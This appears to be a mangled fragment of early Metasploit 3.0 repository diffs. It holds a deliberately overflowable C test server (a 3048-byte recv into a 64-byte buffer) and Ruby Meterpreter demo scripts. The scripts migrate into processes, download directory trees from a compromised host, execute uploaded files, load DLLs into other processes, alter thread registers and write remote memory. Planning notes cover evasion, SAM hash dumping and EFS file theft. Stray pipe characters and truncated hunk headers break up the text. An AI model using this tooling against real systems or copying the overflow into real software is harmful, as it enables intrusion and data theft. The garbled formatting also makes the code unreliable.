/* Set the length of the listen queue */
|
||||
if (listen(s, MAX_PENDING) < 0) {
|
||||
fprintf(stderr, "%s: listen - %s\n", argv[0], strerror(errno));
|
||||
exit(1);
|
||||
}
|
||||
|
||||
|
||||
while (1)
|
||||
{
|
||||
__try
|
||||
{
|
||||
len = sizeof(sin);
|
||||
new_s = accept(s, (struct sockaddr *)&sin, &len);
|
||||
|
||||
CloseHandle(CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Runner, (void *)new_s, 0, NULL));
|
||||
|
||||
} __except(EXCEPTION_EXECUTE_HANDLER)
|
||||
{
|
||||
fprintf(stderr, "Got exception: %lu\n", GetExceptionCode());
|
||||
}
|
||||
}
|
||||
|
||||
return (0);
|
||||
|
||||
}
|
||||
|
||||
void RunnerStuff(int sock)
|
||||
{
|
||||
char buf[64];
|
||||
int bytes;
|
||||
|
||||
bytes = recv(sock, buf, 3048, 0);
|
||||
|
||||
printf("recv'd %d\n", bytes);
|
||||
}
|
||||
|
||||
void Runner(int new_s)
|
||||
{
|
||||
char buf[4096];
|
||||
|
||||
RunnerStuff(new_s);
|
||||
|
||||
fprintf(stderr, "done");
|
||||
}
|
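--- a/dev/merge.sh
+++ /dev/null
@@ -1,18 +0,0 @@
-#!/bin/sh
-
-export DEV=/projects/metasploit/framework3/trunk/
-export SBL=/projects/metasploit/framework3/tags/framework-3.0/
-export FIL=$1
-
-echo "[*] Gathering svn information..."
-TMP=`tempfile mergeXXXXXXX`
-svn log --limit 1 "${DEV}${FIL}" | egrep -v '^r[0-9]+|^--|^$' > $TMP
-
-echo "[*] Copying file ${FIL}..."
-cp ${DEV}${FIL} ${SBL}${FIL}
-
-echo "[*] Merging file ${FIL}..."
-svn add ${SBL}${FIL} >/dev/null 2>&1
-svn commit --non-interactive -F $TMP ${SBL}${FIL}
-
-rm -f $TMP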
|
@ -1,19 +0,0 @@
|
|||
#!/usr/bin/env ruby -I../../lib
|
||||
|
||||
require 'Rex/Post'
|
||||
|
||||
class DemoClient
|
||||
|
||||
def initialize(host, port)
|
||||
self.sock = TCPSocket.new(host, port)
|
||||
self.client = Rex::Post::Meterpreter::Client.new(sock)
|
||||
|
||||
self.client.core.use('Stdapi')
|
||||
end
|
||||
|
||||
attr_reader :client
|
||||
protected
|
||||
attr_accessor :sock
|
||||
attr_writer :client
|
||||
|
||||
end
|
|
@ -1,5 +0,0 @@
|
|||
<html>
|
||||
<center>
|
||||
<h1>Metasploit Post-Exploitation Demo</h1>
|
||||
</center>
|
||||
</html>
|
|
@ -1,19 +0,0 @@
|
|||
#!/usr/bin/env ruby -I. -I../../lib
|
||||
|
||||
require 'DemoClient'
|
||||
|
||||
host = ARGV[0] || '127.0.0.1'
|
||||
port = ARGV[1] || '12345'
|
||||
client = DemoClient.new(host, port).client
|
||||
|
||||
pid = client.sys.process['calc.exe']
|
||||
|
||||
puts "before migrate: my pid is #{client.sys.process.getpid}"
|
||||
|
||||
client.core.migrate(pid)
|
||||
|
||||
puts "after migrate: my pid is #{client.sys.process.getpid}"
|
||||
|
||||
while (1)
|
||||
select nil, nil, nil, 5
|
||||
end
|
|
@ -1,16 +0,0 @@
|
|||
#!/usr/bin/env ruby -I. -I../../lib
|
||||
|
||||
require 'DemoClient'
|
||||
|
||||
host = ARGV[0] || '127.0.0.1'
|
||||
port = ARGV[1] || '12345'
|
||||
src_dir = ARGV[2] || "%WINDIR%\\inf"
|
||||
dst_dir = ARGV[3] || "/tmp/mirror_demo"
|
||||
client = DemoClient.new(host, port).client
|
||||
|
||||
begin
|
||||
Dir.mkdir(dst_dir)
|
||||
rescue
|
||||
end
|
||||
|
||||
client.fs.dir.download(dst_dir, src_dir, true)
|
|
@ -1,16 +0,0 @@
|
|||
#!/usr/bin/env ruby -I. -I../../lib
|
||||
|
||||
require 'DemoClient'
|
||||
|
||||
host = ARGV[0] || '127.0.0.1'
|
||||
port = ARGV[1] || '12345'
|
||||
src_dir = ARGV[2] || "/tmp/mirror_src_demo"
|
||||
dst_dir = ARGV[3] || "c:\\personal\\temp\\dst_mirror"
|
||||
client = DemoClient.new(host, port).client
|
||||
|
||||
begin
|
||||
client.fs.dir.mkdir(dst_dir)
|
||||
rescue
|
||||
end
|
||||
|
||||
client.fs.dir.upload(dst_dir, src_dir, true)
|
|
@ -1,13 +0,0 @@
|
|||
#!/usr/bin/env ruby -I. -I../../lib
|
||||
|
||||
require 'DemoClient'
|
||||
|
||||
HTML_FILE = "demo1.html"
|
||||
|
||||
host = ARGV[0] || '127.0.0.1'
|
||||
port = ARGV[1] || '12345'
|
||||
client = DemoClient.new(host, port).client
|
||||
|
||||
client.fs.file.upload('%TEMP%', HTML_FILE)
|
||||
|
||||
client.sys.process.execute('cmd /C "explorer %TEMP%\demo1.html"')
|
|
@ -1,39 +0,0 @@
|
|||
#!/usr/bin/env ruby -I. -I../../lib
|
||||
|
||||
require 'DemoClient'
|
||||
require 'Rex/Socket/Parameters'
|
||||
|
||||
host = ARGV[0] || '127.0.0.1'
|
||||
port = ARGV[1] || '12345'
|
||||
client = DemoClient.new(host, port).client
|
||||
|
||||
# Create a parameter representation class based on the perl-style hash
|
||||
# elements
|
||||
params = Rex::Socket::Parameters.new(
|
||||
'PeerHost' => '128.242.160.3',
|
||||
'PeerPort' => 25,
|
||||
'Proto' => 'tcp')
|
||||
|
||||
# Create the socket for this connection
|
||||
socket = client.net.socket.create(params)
|
||||
|
||||
# Send GET / HTTP/1.0
|
||||
socket.send("HELO hick.org\r\n")
|
||||
|
||||
data = socket.recv
|
||||
|
||||
puts "#{data}"
|
||||
|
||||
socket.send("QUIT\r\n")
|
||||
|
||||
socket.sock.shutdown(1)
|
||||
|
||||
while ((data = socket.recv) != nil)
|
||||
puts "#{data}"
|
||||
end
|
||||
|
||||
puts "Finished"
|
||||
|
||||
#while (1)
|
||||
# select nil, nil, nil, 5
|
||||
#end
|
|
@ -1,361 +0,0 @@
|
|||
#!/usr/bin/env ruby -I../../lib
|
||||
|
||||
require 'Rex/Post'
|
||||
|
||||
netconf = false
|
||||
ui = false
|
||||
net = false
|
||||
fseek = false
|
||||
dir = false
|
||||
process = true
|
||||
registry = false
|
||||
copy = false
|
||||
|
||||
sock = TCPSocket.new('127.0.0.1', 12345)
|
||||
client = Rex::Post::Meterpreter::Client.new(sock)
|
||||
|
||||
client.core.use(
|
||||
'Stdapi')
|
||||
|
||||
puts "Client interface:"
|
||||
client.dump_extension_tree.each { |x|
|
||||
puts "\t#{x}"
|
||||
}
|
||||
puts "\n\n"
|
||||
|
||||
if (net)
|
||||
s = client.net.create_channel(
|
||||
'PeerHost' => '128.242.160.3',
|
||||
'PeerPort' => '80',
|
||||
'Proto' => 'tcp')
|
||||
|
||||
puts "writing 'GET / HTTP/1.0'..."
|
||||
s.write("GET / HTTP/1.0\r\n\r\n")
|
||||
puts "reading in 20 bytes from the socket:\n#{s.read(20)}"
|
||||
|
||||
s.close
|
||||
end
|
||||
|
||||
if (copy)
|
||||
|
||||
puts "Uploading...\n"
|
||||
client.fs.file.upload("c:\\personal\\temp\\mirror", "/bin/cat", "/tmp/dog")
|
||||
|
||||
puts "Downloading...\n"
|
||||
client.fs.file.download("/tmp/test", "c:\\personal\\temp\\ati3duag.dll",
|
||||
"c:\\personal\\temp\\blah.asm", "c:\\personal\\temp\\boa.tar.gz")
|
||||
|
||||
end
|
||||
|
||||
if (netconf)
|
||||
|
||||
puts "Routes:\n\n"
|
||||
client.net.config.each_route { |route|
|
||||
puts route.pretty
|
||||
}
|
||||
|
||||
puts "\n\nInterfaces:\n\n"
|
||||
|
||||
client.net.config.each_interface { |interface|
|
||||
puts interface.pretty
|
||||
}
|
||||
|
||||
client.net.config.add_route('1.2.3.4', '255.255.255.255', '127.0.0.1')
|
||||
puts "after adding 1.2.3.4 route\n\n"
|
||||
client.net.config.each_route { |route|
|
||||
puts route.pretty
|
||||
}
|
||||
client.net.config.remove_route('1.2.3.4', '255.255.255.255', '127.0.0.1')
|
||||
puts "after removing 1.2.3.4 route\n\n"
|
||||
client.net.config.each_route { |route|
|
||||
puts route.pretty
|
||||
}
|
||||
|
||||
end
|
||||
|
||||
if (ui)
|
||||
input = false
|
||||
|
||||
puts "idle time: #{client.ui.idle_time}"
|
||||
|
||||
sleep 60
|
||||
|
||||
puts "idle time: #{client.ui.idle_time}"
|
||||
|
||||
if (input)
|
||||
puts "disabling"
|
||||
# client.ui.disable_keyboard
|
||||
client.ui.disable_mouse
|
||||
|
||||
sleep 60
|
||||
|
||||
puts "enabling"
|
||||
# client.ui.enable_keyboard
|
||||
client.ui.enable_mouse
|
||||
puts "done"
|
||||
end
|
||||
end
|
||||
|
||||
if (fseek)
|
||||
f = client.fs.file.new("c:\\personal\\temp\\hm.c")
|
||||
|
||||
puts "current position: #{f.tell}"
|
||||
puts "some text:\n#{f.read}"
|
||||
puts "current position: #{f.tell}"
|
||||
f.seek(0, IO::SEEK_SET)
|
||||
puts "current position: #{f.tell}"
|
||||
puts "some text again:\n#{f.read}"
|
||||
f.seek(40, IO::SEEK_SET)
|
||||
puts "eof? #{f.eof}"
|
||||
puts "current position: #{f.tell}"
|
||||
puts "some text again:\n#{f.read}"
|
||||
begin
|
||||
puts "some text again:\n#{f.read}"
|
||||
puts "some text again:\n#{f.read}"
|
||||
rescue EOFError
|
||||
puts "got eof"
|
||||
rescue
|
||||
puts "got other"
|
||||
end
|
||||
puts "eof? #{f.eof}"
|
||||
|
||||
end
|
||||
|
||||
if (dir)
|
||||
puts "Testing dir...\n\n"
|
||||
|
||||
puts "%WINDIR% is #{client.fs.file.expand_path('%WINDIR%')}"
|
||||
|
||||
puts "Getting contents of C:\\"
|
||||
|
||||
client.fs.dir.foreach("C:\\") { |name|
|
||||
puts "\t#{name}\n"
|
||||
}
|
||||
|
||||
puts "working directory: #{client.fs.dir.pwd}"
|
||||
client.fs.dir.chdir("..")
|
||||
puts "working directory: #{client.fs.dir.getwd}"
|
||||
client.fs.dir.chdir("c:\\windows")
|
||||
puts "working directory: #{client.fs.dir.pwd}"
|
||||
client.fs.dir.mkdir("c:\\personal\\temp\\tester")
|
||||
client.fs.dir.unlink("c:\\personal\\temp\\tester")
|
||||
|
||||
s = client.fs.filestat.new("C:\\Windows\\notepad.exe")
|
||||
|
||||
puts s.pretty
|
||||
|
||||
puts client.fs.file.stat("C:\\windows\\notepad.exe").mtime
|
||||
|
||||
# open a file and read in some text
|
||||
f = client.fs.file.new("C:\\personal\\temp\\hm.c")
|
||||
|
||||
puts "some text:\n #{f.read}"
|
||||
|
||||
f.close
|
||||
end
|
||||
|
||||
if (process)
|
||||
puts "Testing process...\n\n"
|
||||
|
||||
puts "exploited pid is #{client.sys.process.getpid}"
|
||||
puts "exploited name is #{client.sys.process.open.name}"
|
||||
puts "exploited path is #{client.sys.process.open.path}"
|
||||
|
||||
##
|
||||
#
|
||||
# enumeration testing
|
||||
#
|
||||
##
|
||||
debug_pid = client.sys.process['calc.exe']
|
||||
|
||||
puts "pid of calc.exe is #{debug_pid}"
|
||||
|
||||
#client.sys.process.kill(debug_pid)
|
||||
|
||||
##
|
||||
#
|
||||
# Load a library in another process
|
||||
#
|
||||
##
|
||||
|
||||
p = client.sys.process.open(debug_pid)
|
||||
base = p.image.load('zipfldr.dll')
|
||||
|
||||
printf "loaded zipfldr.dll into #{p.pid} at %.8x\n", base
|
||||
|
||||
addr = p.image.get_procedure_address('zipfldr.dll', 'RouteTheCall')
|
||||
|
||||
printf "addr of RouteTheCall is: %.8x\n", addr
|
||||
|
||||
p.image.unload(base)
|
||||
|
||||
puts "unloaded it"
|
||||
|
||||
##
|
||||
#
|
||||
# Execution
|
||||
#
|
||||
##
|
||||
|
||||
p = client.sys.process.execute("cmd.exe", nil,
|
||||
{
|
||||
'Channelized' => true
|
||||
})
|
||||
|
||||
d = p.io.read
|
||||
|
||||
puts "read from cmd.exe:\n#{d}"
|
||||
|
||||
p.io.write("dir\n")
|
||||
|
||||
d = p.io.read
|
||||
|
||||
puts "read from cmd.exe:\n#{d}"
|
||||
|
||||
##
|
||||
#
|
||||
# threads
|
||||
#
|
||||
##
|
||||
p = client.sys.process.open(debug_pid)
|
||||
|
||||
p.thread.each_thread { |id|
|
||||
puts "thread id: #{id}"
|
||||
|
||||
thread = p.thread.open(id)
|
||||
|
||||
puts "suspending..."
|
||||
thread.suspend
|
||||
puts "registers:\n"
|
||||
puts thread.pretty_regs
|
||||
thread.set_regs(
|
||||
'eax' => 0x41414141,
|
||||
'ebx' => 0xdeadbeef)
|
||||
puts thread.pretty_regs
|
||||
puts "resuming..."
|
||||
thread.resume
|
||||
puts "closing..."
|
||||
thread.close
|
||||
}
|
||||
|
||||
##
|
||||
#
|
||||
# code injection
|
||||
#
|
||||
##
|
||||
|
||||
#buf = p.memory.allocate(400)
|
||||
#p.memory.write(buf, "\xcc")
|
||||
#p.thread.create(buf)
|
||||
#p.close
|
||||
##
|
||||
#
|
||||
# image testing
|
||||
#
|
||||
##
|
||||
|
||||
exp = client.sys.process.open
|
||||
|
||||
addr = exp.image.load('wininet.dll')
|
||||
printf "wininet.dll is loaded at: %.8x\n", addr
|
||||
|
||||
exp.image.unload(addr)
|
||||
|
||||
printf "LoadLibraryA is at: %.8x\n", exp.image.get_procedure_address('kernel32.dll', 'LoadLibraryA')
|
||||
|
||||
printf "ntdll.dll base is at: %.8x\n", exp.image['ntdll.dll']
|
||||
|
||||
##
|
||||
#
|
||||
# memory testing
|
||||
#
|
||||
##
|
||||
|
||||
p = client.sys.process.open(debug_pid, PROCESS_ALL)
|
||||
|
||||
addr = p.memory.allocate(400, PROT_WRITE | PROT_READ)
|
||||
|
||||
printf "allocated memory at %.8x\n", addr
|
||||
|
||||
p.memory.write(addr, 'this is a test yo')
|
||||
|
||||
data = p.memory.read(addr, 10)
|
||||
|
||||
printf "read memory from %.8x (#{data.length}): #{data.to_s}\n", addr
|
||||
|
||||
info = p.memory.query(addr)
|
||||
|
||||
printf "addr: %.8x (size=%d, prot=%.8x)\n", addr, info['RegionSize'], info['Protect']
|
||||
|
||||
if (p.memory.writable?(addr))
|
||||
puts "memory is writable like it should be\n"
|
||||
end
|
||||
|
||||
p.memory.protect(addr, info['RegionSize'], PROT_READ)
|
||||
|
||||
if (!p.memory.writable?(addr))
|
||||
puts "memory is NOT writable like it should be\n"
|
||||
else
|
||||
puts "memory is writable but it should not be\n"
|
||||
end
|
||||
|
||||
begin
|
||||
p.memory.write(addr, 'test again')
|
||||
rescue
|
||||
puts "caught exception like expected during write #{$!}"
|
||||
end
|
||||
|
||||
p.close
|
||||
|
||||
# attach to the exploited process
|
||||
exp = client.sys.process.open
|
||||
|
||||
addr = exp.memory.allocate(400, PROT_WRITE)
|
||||
|
||||
exp.memory.lock(addr, 4096)
|
||||
exp.memory.unlock(addr, 4096)
|
||||
|
||||
exp.close
|
||||
|
||||
end
|
||||
|
||||
if (registry)
|
||||
puts "Testing registry...\n\n"
|
||||
|
||||
regkey = client.sys.registry.open_key(HKEY_CURRENT_USER,
|
||||
'Software', KEY_ALL_ACCESS)
|
||||
|
||||
puts "hkey is #{regkey.hkey}"
|
||||
|
||||
regkey.set_value('test123', REG_SZ, 'yo what up')
|
||||
regkey.set_value('testdword', REG_DWORD, '666')
|
||||
|
||||
val = regkey.query_value('test123')
|
||||
val2 = regkey.query_value('testdword')
|
||||
|
||||
puts "value name: #{val.name} type: #{val.type} data: '#{val.data}'"
|
||||
puts "value name: #{val2.name} type: #{val2.type} data: '#{val2.data}'"
|
||||
|
||||
val.set('ho ho ho')
|
||||
val.delete
|
||||
|
||||
regkey.enum_key.each { |key|
|
||||
puts "child key: #{key}"
|
||||
}
|
||||
|
||||
regkey.enum_value.each { |value|
|
||||
puts "child value: #{value.name}"
|
||||
}
|
||||
|
||||
k = regkey.create_key('TestKey')
|
||||
k.close
|
||||
regkey.delete_key('TestKey')
|
||||
|
||||
regkey.close
|
||||
end
|
||||
|
||||
while (true)
|
||||
printf("sup\n")
|
||||
|
||||
select nil, nil, nil, 4
|
||||
end
|
|
@ -1,22 +0,0 @@
|
|||
#!/usr/bin/env ruby
|
||||
|
||||
$: << 'lib' << '../lib' << '../../lib'
|
||||
|
||||
require 'socket'
|
||||
require 'rex'
|
||||
require 'rex/post/meterpreter'
|
||||
|
||||
if(ARGV.length != 2)
|
||||
puts "usage: <ip> <port>"
|
||||
exit(1)
|
||||
end
|
||||
|
||||
sock = TCPSocket.new(ARGV[0], ARGV[1])
|
||||
|
||||
c = Rex::Post::Meterpreter::Client.new(sock)
|
||||
|
||||
c.core.use('Stdapi')
|
||||
|
||||
@c = c
|
||||
|
||||
irb
|
|
@ -1,6 +0,0 @@
|
|||
|
||||
- make it so packet dispatcher does not wait if timeout is 0
|
||||
|
||||
- priv
|
||||
- add commands to search out efs files and download them
|
||||
|
|
@ -1,30 +0,0 @@
|
|||
This file contains things that need to be done that aren't in the plan:
|
||||
|
||||
- revisit pivoting
|
||||
- connections seemed slow
|
||||
- data transfers seemed slow
|
||||
|
||||
Buggies:
|
||||
|
||||
- An exploit that has Compat = -find in the Payload section will still list
|
||||
meterpreter's find_tag payload as compatible
|
||||
|
||||
- The target info should provide a packing function that matches the arch and
|
||||
platform set in the target. Right now all exploits are calling big or little
|
||||
packers on the target, regardless of the target arch.
|
||||
|
||||
- If the Authors is supplied as an array, with only a single author, and
|
||||
that author isnt in the known list, a crash will occur.
|
||||
|
||||
./user_interfaces/../lib/rex/ui/text/dispatcher_shell.rb:184:in `run_command'
|
||||
./user_interfaces/../lib/rex/transformer.rb:30:in `transform'
|
||||
./user_interfaces/../lib/rex/transformer.rb:29:in `transform'
|
||||
./user_interfaces/../lib/msf/core/module/author.rb:29:in `transform'
|
||||
./user_interfaces/../lib/msf/core/module.rb:108:in `initialize'
|
||||
./user_interfaces/../lib/msf/core/exploit.rb:170:in `initialize'
|
||||
./user_interfaces/../lib/msf/core/exploit/tcp.rb:16:in `initialize'
|
||||
./user_interfaces/../lib/msf/core/exploit/ftp.rb:19:in `initialize'
|
||||
/home/projects/metasploit/rubyhacks/modules/exploits/windows/ftp/freeftpd_user.rb:62:in `initialize'
|
||||
./user_interfaces/../lib/msf/core/module_manager.rb:47:in `create'
|
||||
./user_interfaces/../lib/msf/core/module_manager.rb:251:in `create'
|
||||
./user_interfaces/../lib/msf/ui/console/command_dispatcher/core.rb:871:in `cmd_use'
|
|
@ -1,18 +0,0 @@
|
|||
msf/core
|
||||
- encoding is slow sometimes, profile it
|
||||
|
||||
meterpreter
|
||||
- migration sometimes does partial reads of stages leading to crashes
|
||||
- should switch to inlined staging in request packet
|
||||
|
||||
msfconsole
|
||||
- jobs -k on the same exploit twice leads to exception
|
||||
|
||||
|
||||
win32 bugs
|
||||
|
||||
- 'gets' blocks
|
||||
- http://blade.nagaokaut.ac.jp/cgi-bin/scat.rb/ruby/ruby-talk/151367
|
||||
- works in cmd.exe
|
||||
- does not work in rxvt (kbhit just keeps returning 0)
|
||||
X - no HOME variable by default -- need to use another directory
|
|
@ -1,53 +0,0 @@
|
|||
Major subsystems
|
||||
----------------
|
||||
|
||||
rex (lib/rex)
|
||||
|
||||
Contains generic classes that are used by various libraries
|
||||
and by framework-core and other subsystems.
|
||||
|
||||
framework-core (lib/msf/core)
|
||||
|
||||
Provides the interface for interacting with modules, managing
|
||||
sessions, and coordinating exploitation.
|
||||
|
||||
framework-base (lib/msf/base)
|
||||
|
||||
Implementations of the default sessions included in the
|
||||
framework, such as Meterpreter, and other various elements
|
||||
that are outside of the scope of framework-core. This
|
||||
subsystem also provides a simple wrapper to framework-core
|
||||
insofar as dealing with exploitation, encoding, payload,
|
||||
and session interaction.
|
||||
|
||||
Dependencies
|
||||
------------
|
||||
|
||||
+------------------+
|
||||
| Rex |
|
||||
+------------------+
|
||||
^
|
||||
|
|
||||
|
|
||||
|
|
||||
+------------------+
|
||||
| framework-core |
|
||||
+------------------+
|
||||
^
|
||||
|
|
||||
|
|
||||
|
|
||||
+------------------+
|
||||
| framework-base |
|
||||
+------------------+
|
||||
^ ^
|
||||
/ \
|
||||
/ \
|
||||
/ \
|
||||
+-----------------+ +-----------------+
|
||||
| user interface | | modules |
|
||||
+-----------------+ +-----------------+
|
||||
| msfconsole | | encoders |
|
||||
| msfweb | | exploits |
|
||||
| msfgtk | | payloads |
|
||||
+-----------------+ +-----------------+
|
|
@ -1,7 +0,0 @@
|
|||
|
||||
|
||||
-= Logging
|
||||
|
||||
The following descriptions explain when each log level should be used.
|
||||
|
||||
|
|
@ -1,22 +0,0 @@
|
|||
- meterpreter
|
||||
- many more advanced commands
|
||||
- in-memory process migration
|
||||
- disable/enable user input (keyboard/mouse)
|
||||
- check remote idle time
|
||||
- pivot through hosts
|
||||
- interact with processes, threads, files, and the registry
|
||||
- load DLLs into remote processes
|
||||
- dump SAM database hashes
|
||||
- irb mode
|
||||
- msfconsole
|
||||
- multiple concurrent sessions
|
||||
- session backgrounding
|
||||
- exploit backgrounding
|
||||
- multiple concurrent exploits
|
||||
- especially useful for passive exploits, like clientside bugs
|
||||
- irb mode
|
||||
- msfopcode
|
||||
- new command line interface to opcode db
|
||||
- msfd
|
||||
- daemonized version of msfconsole
|
||||
- all clients share the same framework instance
|
|
@ -1,111 +0,0 @@
|
|||
The Metasploit staff is proud to present the 3.0 alpha release of the Metasploit
|
||||
Framework. This release marks a major milestone in the evolution of the
|
||||
framework, and it's one that the staff hopes will push the framework into even
|
||||
wider acceptance. The major differences between the 3.0 version of the
|
||||
framework and prior versions center around one basic goal: automation. It has
|
||||
become clear that the processes involved in performing a penetration test are
|
||||
generally monotonous and could be easily streamlined, at least in part. For
|
||||
that reason, many aspects of the framework have been designed with a focus on
|
||||
making it easy for the builtin code to be easy to work with at a scripting
|
||||
level. Furthermore, a keen interest has been put into making it possible to
|
||||
augment and extend the framework's functionality beyond the scope to which it
|
||||
has already been applied.
|
||||
|
||||
While this high-level description of the enhancements offerred by the 3.0
|
||||
version may be fairly abstract, a number of particularly interesting
|
||||
enhancements can be shown to give the impression of just what's in store.
|
||||
|
||||
== The Console Interface
|
||||
|
||||
The Metasploit console interface, msfconsole, has roughly the same look and feel,
|
||||
but some of the more notable changes include:
|
||||
|
||||
- Backgrounded exploits
|
||||
|
||||
It's now possible to execute an exploit in the background. This means you
|
||||
can have an exploit that triggers a passive vulnerability (such as a browser
|
||||
bug) while aggressively doing other tasks.
|
||||
|
||||
- Multi-session exploits
|
||||
|
||||
Unlike the 2.x version of the framework, the 3.0 version is capable of
|
||||
creating multiple sessions from a single exploit. This is especially useful
|
||||
in the context of passive exploits that can have multiple clients
|
||||
connecting.
|
||||
|
||||
- Multiple concurrent sessions
|
||||
|
||||
It is possible to have more than one active session established.
|
||||
|
||||
- IRB mode
|
||||
|
||||
Like Meterpreter, the console interface supports dropping into a ruby
|
||||
scripting interface that makes it possible to directly interact with the
|
||||
framework. This makes it possible to do low-level interaction with
|
||||
sessions and framework modules.
|
||||
|
||||
== The Meterpreter
|
||||
|
||||
The meterpreter that is included in the 3.0 version of the framework is almost
|
||||
nothing like what exists in the 2.0 version. The underlying architecture and
|
||||
design remains the same, but the feature set and interface has been greatly
|
||||
enhanced to not only make scripting the post-exploitation process possible but
|
||||
to also increase the level of functionality. Instead of having separate modules
|
||||
for each of the major subsystems (Fs, Process, Net, Sys), the 3.0 version of the
|
||||
meterpreter has merged all of these common elements into one extension called
|
||||
Stdapi, short for the Standard API. This API provides access to the file
|
||||
system, registry, network, threads, processes, user interface, and much more.
|
||||
Some of the cooler features of the new version of meterpreter include:
|
||||
|
||||
- In-memory process migration
|
||||
|
||||
This feature makes it possible to migrate the meterpreter server instance to
|
||||
a completely different process, such as a system service like lsass.exe,
|
||||
without having to establish a new connection. This means that if you
|
||||
exploit an HTTP server and re-use the port 80 connection for the meterpreter
|
||||
session, then it's possible to appear almost completely transparent due to
|
||||
the elimination of the need to create a new connection. Furthermore,
|
||||
migrating to a privileged process has the added benefit of making the server
|
||||
impossible to kill without taking down the whole machine.
|
||||
|
||||
- Disabling user keyboard and mouse input
|
||||
|
||||
This feature makes it possible to prevent local keyboard and mouse input.
|
||||
|
||||
- SAM database hash retrieval
|
||||
|
||||
The SAM juicer extension that Vinnie Liu authored has been integrated into a
|
||||
more generalized privilege escalation extension known as 'priv'. In the
|
||||
future, this extension will provide local privilege escalation exploits.
|
||||
|
||||
- Advanced process manipulation
|
||||
|
||||
The 3.0 version of meterpreter has extensive support for interacting with
|
||||
processes in terms of loading and unloading DLLs; reading, writing,
|
||||
querying, allocating, and freeing memory; opening, creating, closing,
|
||||
terminating, suspending, querying, and modifying threads; writing, and
|
||||
reading standard input output, and so on.
|
||||
|
||||
- IRB mode
|
||||
|
||||
This feature is especially cool for all of the scripters out there. It
|
||||
allows a user to drop into an interactive ruby shell that can be used to use
|
||||
meterpreter at the scripting level rather than at the user-interface level.
|
||||
This can be very useful because the scripting level features are far more
|
||||
powerful and featureful than the user-interface.
|
||||
|
||||
- Network pivoting
|
||||
|
||||
Like other products, the 3.0 version of the framework supports seamless
|
||||
pivoting through meterpreter. The 2.x branch of the framework had very
|
||||
minimal support for this feature, but the 3.0 version is planned to have
|
||||
much more robust support.
|
||||
|
||||
This release is meant to serve as a method of getting feedback and
|
||||
correcting bugs prior to entering a true beta period. There are many features
|
||||
that have not been completely implemented at this point and there are still some
|
||||
edges that will need to be roughed out prior to the final release. Some of the
|
||||
major features that have not been completed are:
|
||||
|
||||
- Native Windows support (due to interpreter issues)
|
||||
- msfweb exploit and session interfaces
|
|
@ -1,21 +0,0 @@
|
|||
evasion
|
||||
- new command: 'evasion'
|
||||
- -l, list evasion subsystems
|
||||
- set evasion subsystem level
|
||||
- get evasion subsystem level
|
||||
- set global evasion level
|
||||
- get global evasion level
|
||||
- modules cache evasion level at creation time
|
||||
- modules pass evasion flags onto sockets via params
|
||||
- sockets and protocols register subsystems
|
||||
- sockets to take passed evasion level in precedence over subsystem/global
|
||||
- consider http evasion
|
||||
- random headers
|
||||
- consider EvasionLevel advanced option on all exploits
|
||||
|
||||
misc
|
||||
- session sharing through multiplexing
|
||||
|
||||
recon
|
||||
- track exploit success, failure, host information
|
||||
- support searching the knowledge base
|
|
@ -1,35 +0,0 @@
|
|||
<b>Scheduled alpha preview release:</b> December 15th, 2005<br/>
|
||||
<br/>
|
||||
Metasploit 3.0 is the next generation of the Metasploit Framework. It is written
|
||||
in the <a href="http://www.ruby-lang.org/">Ruby</a> programming language.
|
||||
As it stands, the 2.0 branch has made it possible to drastically reduce the
|
||||
amount of time it takes to implement an exploit with the added benefit of making
|
||||
it possible to re-use large amounts of code between various exploits. The
|
||||
extensible model through which payloads, encoders, NOP generators, and exploits
|
||||
can be integrated has made it possible to use the Metasploit Framework as an
|
||||
outlet for cutting-edge exploitation research.<br/>
|
||||
<br/>
|
||||
In this light, the 3.0 version is being planned to help continue to evolve
|
||||
the field of exploitation research and exploitation frameworks in general.
|
||||
The primary goals of the 3.0 version are listed below:<br/>
|
||||
<ul>
|
||||
<li>To improve automation of exploitation through scripting
|
||||
<li>To simplify the process of writing an exploit
|
||||
<li>To increase code re-use between exploits
|
||||
<li>To improve and generically integrate evasion techniques
|
||||
<li>To support automated network discovery and event correlation through <i>recon</i> modules
|
||||
<li>To continue to provide a friendly outlet to cutting edge exploitation technology
|
||||
</ul>
|
||||
As we get closer to the preview release date, we will begin posting design
|
||||
documentation and other information that will allow the community to assess
|
||||
the new architecture and provide feedback. The preview release will simply
|
||||
be used as a milestone by which the public can help us to gauge how much
|
||||
work remains until we feel comfortable that we have a finished product.<br/>
|
||||
<br/>
|
||||
In the meantime, here are some screenshots of the 3.0 release in development. Nothing
|
||||
too fancy at this point, but it highlights some of the upcoming changes.<br/>
|
||||
<br/>
|
||||
<a href="http://www.hick.org/~mmiller/msf3/pics">Metasploit 3.0 Preview Screenshots</a>
|
||||
<br/>
|
||||
<br/>
|
||||
- Metasploit Staff
|
|
@ -1,130 +0,0 @@
|
|||
The following things are required for the December alpha release:
|
||||
|
||||
|
||||
- rex
|
||||
X - post-exploitation
|
||||
X - meterpreter
|
||||
X - pivoting
|
||||
X - portfwd command
|
||||
- networking
|
||||
X - switch board routing table for pivoting
|
||||
X - meterpreter 'comm' support
|
||||
- proxy 'comm' support
|
||||
- asm
|
||||
- block dependencies (req'd for shikata)
|
||||
- block permutation generation (req'd for shikata)
|
||||
X - text
|
||||
X - create_pattern, pattern_offset
|
||||
X - base64
|
||||
X - consider extending String
|
||||
X - logging
|
||||
X - debug level limiter
|
||||
X - define log levels, when they should be used, etc
|
||||
- framework-core
|
||||
X - modules
|
||||
X - reloading
|
||||
X - compatibility filtering (keys)
|
||||
X - description sanitation (strip lines/etc)
|
||||
X - payloads
|
||||
X - meta information
|
||||
X - stager/stage calling conventions
|
||||
X - stack requirements
|
||||
X - make payload prepend target specific
|
||||
X - sessions
|
||||
X - logging session activity
|
||||
- module load caching
|
||||
- switch to demand loaded modules rather than always loading
|
||||
- should make things faster
|
||||
X - recon
|
||||
X - add a method like 'can_be_used' that checks whether or not dependencies are
|
||||
X on the machine (like nmap) for a given module
|
||||
- framework task queuing
|
||||
- make the framework expose methods for queuing tasks (FrameworkTask)
|
||||
- generic interface with an execute method
|
||||
- called from within the context of a worker thread
|
||||
- modules needing ports (above other modules)
|
||||
- encoders
|
||||
- shikata
|
||||
X - nops
|
||||
X - opty2
|
||||
- payloads
|
||||
- cmd payloads
|
||||
X - mac os x payloads
|
||||
- osx null free reverse stager
|
||||
X - solaris payloads
|
||||
X - bsd payloads
|
||||
- user interfaces
|
||||
- general
|
||||
X - add concept of EVASION option (high, normal, low)
|
||||
X - logging improvements
|
||||
X - provide log file setting interface
|
||||
